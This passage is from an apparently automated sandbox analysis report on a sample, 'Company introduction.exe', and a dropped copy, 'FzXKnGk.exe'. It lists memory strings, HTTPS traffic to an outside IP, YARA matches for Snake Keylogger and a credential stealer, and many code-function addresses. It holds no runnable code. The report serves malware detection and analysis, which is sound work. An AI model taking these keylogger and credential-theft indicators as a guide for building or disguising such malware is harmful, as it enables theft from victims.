0000000C.00000002.2940815636.000000000344C000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000046E9000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004422000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004497000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004614000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Company introduction.exe, 00000006.00000002.2950101107.000000000415D000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004424000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041D2000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004301000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.000000000432C000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004188000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045CC000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000046C4000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004472000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004428000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000043FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003537000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.000000000344C000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: Company introduction.exe, 00000006.00000002.2941471703.0000000003291000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Company introduction.exe PID: 7452, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: FzXKnGk.exe PID: 7888, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: FzXKnGk.exe PID: 8144, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_014B42240_2_014B4224
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_014B42080_2_014B4208
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_014B7D630_2_014B7D63
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_014B7D990_2_014B7D99
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE05B00_2_07AE05B0
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE44C80_2_07AE44C8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE40880_2_07AE4088
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE5B300_2_07AE5B30
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AED73A0_2_07AED73A
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE47020_2_07AE4702
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE47100_2_07AE4710
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE05A00_2_07AE05A0
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE35E80_2_07AE35E8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE35F80_2_07AE35F8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE44B80_2_07AE44B8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AEF40A0_2_07AEF40A
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AEF4180_2_07AEF418
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE23A80_2_07AE23A8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE23B80_2_07AE23B8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE63E00_2_07AE63E0
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE63D20_2_07AE63D2
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE53620_2_07AE5362
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE21C20_2_07AE21C2
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE00110_2_07AE0011
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE407A0_2_07AE407A
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE00400_2_07AE0040
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AEDFB00_2_07AEDFB0
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE2F680_2_07AE2F68
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE2F590_2_07AE2F59
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE4EA00_2_07AE4EA0
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE4EB00_2_07AE4EB0
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE5B220_2_07AE5B22
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AEDB680_2_07AEDB68
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE3A810_2_07AE3A81
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE3A900_2_07AE3A90
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE4A680_2_07AE4A68
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE4A580_2_07AE4A58
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE69B80_2_07AE69B8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE69C80_2_07AE69C8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE38080_2_07AE3808
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07AE38180_2_07AE3818
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07E95F000_2_07E95F00
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 0_2_07E900400_2_07E90040
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017DC1466_2_017DC146
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017D53626_2_017D5362
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017DD2786_2_017DD278
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017DC4686_2_017DC468
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017DC7386_2_017DC738
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017D69A06_2_017D69A0
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017DE9886_2_017DE988
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017D3B856_2_017D3B85
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017DCA086_2_017DCA08
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017D9DE06_2_017D9DE0
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017DCCD86_2_017DCCD8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017D6FC86_2_017D6FC8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017DCFAA6_2_017DCFAA
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017DF6316_2_017DF631
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017DE97A6_2_017DE97A
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017D29EC6_2_017D29EC
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017D3AA16_2_017D3AA1
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017DFA886_2_017DFA88
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017D3E096_2_017D3E09
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A895486_2_05A89548
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A850286_2_05A85028
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A89C706_2_05A89C70
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8D9A86_2_05A8D9A8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8D9996_2_05A8D999
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8DDFF6_2_05A8DDFF
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A829686_2_05A82968
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8D5406_2_05A8D540
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8295B6_2_05A8295B
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8D5506_2_05A8D550
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8CCA06_2_05A8CCA0
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8D0F86_2_05A8D0F8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8F8036_2_05A8F803
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A800066_2_05A80006
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A850186_2_05A85018
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8F8106_2_05A8F810
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8FC686_2_05A8FC68
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A89C636_2_05A89C63
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A800406_2_05A80040
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8F3A86_2_05A8F3A8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A817A06_2_05A817A0
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A88BA06_2_05A88BA0
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8F3B86_2_05A8F3B8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8178F6_2_05A8178F
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A88B906_2_05A88B90
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A893286_2_05A89328
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A80B206_2_05A80B20
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A80B306_2_05A80B30
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8EB086_2_05A8EB08
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8EF606_2_05A8EF60
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8EF516_2_05A8EF51
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8E6AF6_2_05A8E6AF
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8E6B06_2_05A8E6B0
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A81E806_2_05A81E80
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8EAF86_2_05A8EAF8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8DE006_2_05A8DE00
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A81E706_2_05A81E70
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8E24B6_2_05A8E24B
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A8E2586_2_05A8E258
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_00DB42247_2_00DB4224
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_00DB42087_2_00DB4208
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_00DB4B897_2_00DB4B89
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_00DB7D987_2_00DB7D98
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_00DB7D627_2_00DB7D62
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_029480B87_2_029480B8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_0294F4007_2_0294F400
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_0294FB587_2_0294FB58
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_0294E8C17_2_0294E8C1
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_029412F87_2_029412F8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_0294F3F17_2_0294F3F1
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_029485B27_2_029485B2
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE44C87_2_06EE44C8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE05B07_2_06EE05B0
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE40887_2_06EE4088
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE5B307_2_06EE5B30
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EED73A7_2_06EED73A
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE47037_2_06EE4703
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE47107_2_06EE4710
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE44B87_2_06EE44B8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EEF40A7_2_06EEF40A
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EEF4187_2_06EEF418
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE35E87_2_06EE35E8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE35F87_2_06EE35F8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE05A07_2_06EE05A0
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE63E07_2_06EE63E0
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE63D17_2_06EE63D1
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE23A87_2_06EE23A8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE23B87_2_06EE23B8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE53637_2_06EE5363
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE407B7_2_06EE407B
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE00407_2_06EE0040
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE00067_2_06EE0006
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE21C37_2_06EE21C3
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE4EA07_2_06EE4EA0
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE4EB07_2_06EE4EB0
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EEDFB07_2_06EEDFB0
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE2F687_2_06EE2F68
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE2F597_2_06EE2F59
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE3A817_2_06EE3A81
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE3A907_2_06EE3A90
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE4A687_2_06EE4A68
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE4A587_2_06EE4A58
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EEDB687_2_06EEDB68
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE5B237_2_06EE5B23
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE38087_2_06EE3808
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE38187_2_06EE3818
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE69C87_2_06EE69C8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE69B87_2_06EE69B8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_0183C14712_2_0183C147
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_0183536212_2_01835362
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_0183D27812_2_0183D278
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_0183C46812_2_0183C468
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_0183C73812_2_0183C738
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_0183F63112_2_0183F631
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_0183E98812_2_0183E988
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_018369A012_2_018369A0
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_0183CA0812_2_0183CA08
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_01839DE012_2_01839DE0
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_0183CCD812_2_0183CCD8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_0183CFAB12_2_0183CFAB
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_01836FC812_2_01836FC8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_018329E012_2_018329E0
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_0183E97B12_2_0183E97B
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_0183FA8812_2_0183FA88
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F61E8012_2_06F61E80
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F617A012_2_06F617A0
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F60B3012_2_06F60B30
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F69C7012_2_06F69C70
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6502812_2_06F65028
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6296812_2_06F62968
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6954812_2_06F69548
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6EAF812_2_06F6EAF8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6E6B012_2_06F6E6B0
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6E6AF12_2_06F6E6AF
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F61E7012_2_06F61E70
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6E25812_2_06F6E258
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6E24912_2_06F6E249
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6DE0012_2_06F6DE00
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6F3B812_2_06F6F3B8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F68BA012_2_06F68BA0
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6178F12_2_06F6178F
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6EF6012_2_06F6EF60
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6EF5112_2_06F6EF51
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F60B2012_2_06F60B20
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6EB0812_2_06F6EB08
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6D0F812_2_06F6D0F8
